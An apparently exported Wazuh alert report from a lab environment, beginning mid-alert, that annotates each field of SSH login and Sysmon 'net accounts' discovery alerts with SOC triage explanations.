
data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:42:46.440+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:46.440+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534566.2264775
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:42:45.773883+00:00 server1 sshd[3349]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:42:45.773883+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  simba(uid=1000)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.uid:  0
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

sshd: authentication success.

🧠 What happened? sshd: authentication success.

🔍 Why it's important: Moderate‑risk ATT&CK technique

🕒 2025-04-24T22:42:46.440+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement'] – ['Valid Accounts', 'Remote Services'] [T1078] [T1021]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

[Medium] T1021 – Remote Services

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:46.440+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  sshd: authentication success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5715
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078', 'T1021']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts', 'Remote Services']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'sshd', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534566.2265234
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:42:45.764776+00:00 server1 sshd[3349]: Accepted password for simba from 192.168.6.135 port 60874 ssh2
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:42:45.764776+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  sshd
Parent decoder used – for nested parsing.

decoder.name:  sshd
Name of the Wazuh decoder that parsed this raw log.

data.srcip:  192.168.6.135
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.srcport:  60874
Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.

data.dstuser:  simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Moderate‑risk ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:50.744+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:50.744+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534570.2265701
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.0819453Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291045
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.074 ProcessGuid: {94294ddc-be63-680a-220c-000000000e00} ProcessId: 8356 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be62-680a-200c-000000000e00} ParentProcessId: 8592 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.074
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-220c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be62-680a-200c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8592
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:50.821+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:50.821+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour. Note that net.exe hands its sub-commands to net1.exe, so every `net` command produces two Process Create events and, when the rule matches both, two hits.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534570.2270752
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Sysmon, so the data.win.eventdata.* fields below follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon's fixed provider GUID. Filter on it when you need an exact provider match rather than the display name.

data.win.system.eventID:  1
Sysmon Event ID 1: Process Create. Sysmon has its own ID space; the Security log's process-creation event is 4688 and its 4624 is a logon, so don't read this 1 against the Security-log table.

data.win.system.version:  5
Schema version of this event type. Newer Sysmon releases add fields to Event ID 1, so parsers that hard-code field positions break when this changes.

data.win.system.level:  4
Windows event level: 4 = Informational (1 Critical, 2 Error, 3 Warning, 5 Verbose). Sysmon's telemetry events are all Informational, so this carries no severity signal; it is rendered as INFORMATION in severityValue below.

data.win.system.task:  1
Task number from the provider manifest. For Sysmon it mirrors the event ID: 1 = Process Create.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.1334158Z
When the event log stamped the record (UTC, 100 ns units). Agrees with data.win.eventdata.utcTime to the millisecond; the `timestamp` at the top is when the Wazuh manager ingested it, about seven seconds later.

data.win.system.eventRecordID:  291050
Incremental log record number – handy for timeline order. The IDs skipped between the alerts on this page are Sysmon records that did not raise an alert; pull them from the host for a complete timeline.

data.win.system.processID:  3712
PID of the process that wrote the record: the Sysmon service (the same 3712 on every event here), not the process being reported. The reported process is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in; the one to open in Event Viewer or pass to wevtutil on the host.

data.win.system.computer:  Attacker
Hostname stamped by Windows. Should match agent.name; a mismatch means a renamed host or a log forwarded from another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.130 ProcessGuid: {94294ddc-be63-680a-230c-000000000e00} ProcessId: 10588 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
The event rendered as one string. Every value in it is also broken out into the data.win.eventdata.* fields below; query on those and use this for a one-glance read.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.130
When Sysmon saw the process start, in UTC. The alert `timestamp` above is about seven seconds later: that is agent-to-manager delivery delay, not dwell time.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-230c-000000000e00}
Sysmon's identifier for the new process. Unlike a PID it is never reused, so pivot on it: it appears as parentProcessGuid in every child's Event ID 1 (the net1.exe event in the next alert).

data.win.eventdata.processId:  10588
PID of the new process. Windows recycles PIDs, so only trust it together with utcTime.

data.win.eventdata.image:  C:\Windows\SysWOW64\net.exe
Full path of the executable that started. SysWOW64 is the 32‑bit copy: the parent is a 32‑bit process, so WOW64 file-system redirection served it the 32‑bit binary. Not a masquerade on its own.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
Version resource of the PE. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.

data.win.eventdata.description:  Net Command
File description string from the PE version resource. Informational; unsigned metadata an attacker can set to anything.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the version resource. Same caveat.

data.win.eventdata.company:  Microsoft Corporation
Company string from the version resource. Same caveat.

data.win.eventdata.originalFileName:  net.exe
Name compiled into the binary. If it differs from the file name in image, the executable was renamed (classic LOLBin evasion). Here they match.

data.win.eventdata.commandLine:  net.exe accounts
The exact command line. `net accounts` prints the local password and lockout policy: harmless output, but policy enumeration is what rule 92031 keys on. ATT&CK files `net accounts` under T1201 Password Policy Discovery; the rule's T1087 tag is the broader account-discovery bucket.

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory, inherited from the parent. This is the Wazuh agent's install directory, consistent with the agent itself launching the command.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the new process runs as. SYSTEM together with terminalSessionId 0 means a service context, not an interactive user.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon identifier of the logon session; correlate processes from the same session with it.

data.win.eventdata.logonId:  0x3e7
Windows logon ID. 0x3E7 (999) is the well-known ID of the SYSTEM logon on every machine, so it is not a useful cross-host pivot.

data.win.eventdata.terminalSessionId:  0
Session 0 is reserved for services and system processes; interactive desktops are session 1 and up.

data.win.eventdata.integrityLevel:  System
Mandatory integrity level. System is above High (elevated admin), matching the SYSTEM user.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
SHA-256 of the image file (algorithms per the Sysmon HashAlgorithms setting). Compare across hosts on the same build or against a known-good inventory; a different hash for net.exe on an otherwise identical build deserves a look.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
Sysmon GUID of the parent. Search Event ID 1 for this value as processGuid to get the parent's own creation record and command line.

data.win.eventdata.parentProcessId:  3244
PID of the parent at the time of the spawn.

data.win.eventdata.parentImage:  C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
The process that launched net.exe: the Wazuh agent service itself. Wazuh's Security Configuration Assessment (SCA) policies run commands such as `net accounts` and `net user administrator` to evaluate password-policy and Administrator-account checks, which would account for both the command and the SYSTEM context. That is an inference from the parent, not something this alert proves: confirm against this agent's SCA policy and scan schedule before closing it as expected behaviour. The same command with any other parent (cmd.exe in a user session, an Office process, a web-server worker) deserves the full Medium treatment.

data.win.eventdata.parentCommandLine:  "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
How the parent was started. A bare service path with no arguments is what the service control manager produces.

data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account of the parent. Matches the child, so no change of account between the two.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:50.869+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:50.869+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour. Note that net.exe hands its sub-commands to net1.exe, so every `net` command produces two Process Create events and, when the rule matches both, two hits; this alert is the second half of the one above.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534570.2275989
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Sysmon, so the data.win.eventdata.* fields below follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon's fixed provider GUID. Filter on it when you need an exact provider match rather than the display name.

data.win.system.eventID:  1
Sysmon Event ID 1: Process Create. Sysmon has its own ID space; the Security log's process-creation event is 4688 and its 4624 is a logon, so don't read this 1 against the Security-log table.

data.win.system.version:  5
Schema version of this event type. Newer Sysmon releases add fields to Event ID 1, so parsers that hard-code field positions break when this changes.

data.win.system.level:  4
Windows event level: 4 = Informational (1 Critical, 2 Error, 3 Warning, 5 Verbose). Sysmon's telemetry events are all Informational, so this carries no severity signal; it is rendered as INFORMATION in severityValue below.

data.win.system.task:  1
Task number from the provider manifest. For Sysmon it mirrors the event ID: 1 = Process Create.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.2449488Z
When the event log stamped the record (UTC, 100 ns units). Agrees with data.win.eventdata.utcTime to the millisecond; the `timestamp` at the top is when the Wazuh manager ingested it, about seven seconds later.

data.win.system.eventRecordID:  291053
Incremental log record number – handy for timeline order. The IDs skipped between the alerts on this page are Sysmon records that did not raise an alert; pull them from the host for a complete timeline.

data.win.system.processID:  3712
PID of the process that wrote the record: the Sysmon service (the same 3712 on every event here), not the process being reported. The reported process is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in; the one to open in Event Viewer or pass to wevtutil on the host.

data.win.system.computer:  Attacker
Hostname stamped by Windows. Should match agent.name; a mismatch means a renamed host or a log forwarded from another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

